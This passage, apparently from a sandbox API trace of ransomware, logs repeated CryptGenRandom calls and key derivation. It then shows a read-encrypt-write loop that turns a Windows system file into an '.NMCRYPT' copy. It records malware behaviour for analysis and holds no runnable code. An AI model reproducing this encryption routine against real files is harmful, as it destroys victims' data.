hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.193] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.193] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.193] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.193] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.193] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.193] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.193] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.193] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.193] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.193] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.193] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.193] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.193] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.193] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.193] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.194] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.194] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.194] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.194] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.194] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.194] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.194] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.194] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.194] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.194] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.194] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.194] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.194] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.194] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.194] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.194] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.194] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.194] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.194] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.194] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.194] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.194] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.194] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.194] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.194] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.194] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.194] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.194] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.194] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.194] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.194] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.194] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.194] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.194] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.194] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.194] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.194] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.194] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.194] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.194] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.194] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.194] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.194] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.194] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.194] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.194] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.194] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.194] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.194] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.194] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.195] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.195] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.195] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.195] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.195] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.195] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.195] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.195] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.195] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.195] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.195] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.195] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.195] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.195] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.195] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.195] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.195] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.195] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.195] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.195] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.195] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.195] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.195] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.195] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.195] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.195] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.195] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.195] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.195] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.195] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.195] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.195] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.195] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.195] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.195] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.195] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.195] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.195] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.195] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.195] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.195] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.195] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.195] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.195] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.195] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.195] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.195] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.195] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.196] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.196] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.196] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.196] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.196] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.196] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.196] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.196] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.196] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.196] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.196] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.196] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.196] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.196] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.196] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.196] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.196] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.196] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.196] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.196] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.196] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.196] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.196] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.196] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.196] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.196] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.196] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.196] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.196] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.196] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.196] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0148.197] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0148.197] CryptCreateHash (in: hProv=0x8e3198, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44483c | out: phHash=0x1d44483c) returned 1 [0148.197] CryptHashData (hHash=0x9ad238, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0148.197] CryptDeriveKey (in: hProv=0x8e3198, Algid=0x6610, hBaseData=0x9ad238, dwFlags=0x4, phKey=0x1d444840 | out: phKey=0x1d444840*=0x9ad5f8) returned 1 [0148.197] CryptSetKeyParam (hKey=0x9ad5f8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0148.197] CryptSetKeyParam (hKey=0x9ad5f8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0148.197] wcslen (_String="\\\\?\\") returned 0x4 [0148.197] CryptDuplicateKey (in: hKey=0x9ad5f8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e174 | out: phKey=0x2d7e174*=0x9ad738) returned 1 [0148.197] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\tipresx.dll.mui.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\bg-bg\\tipresx.dll.mui.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0148.197] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\bg-bg\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0148.198] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e164 | out: lpFileSize=0x2d7e164*=8704) returned 1 [0148.198] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e15c*=0x200, lpOverlapped=0x0) returned 1 [0148.203] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.205] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.205] GetLastError () returned 0x0 [0148.205] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.294] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.295] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.295] GetLastError () returned 0x0 [0148.295] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.295] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.295] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.295] GetLastError () returned 0x0 [0148.295] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.295] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.295] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.295] GetLastError () returned 0x0 [0148.295] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.295] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.295] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.295] GetLastError () returned 0x0 [0148.295] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.295] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.295] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.295] GetLastError () returned 0x0 [0148.295] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, 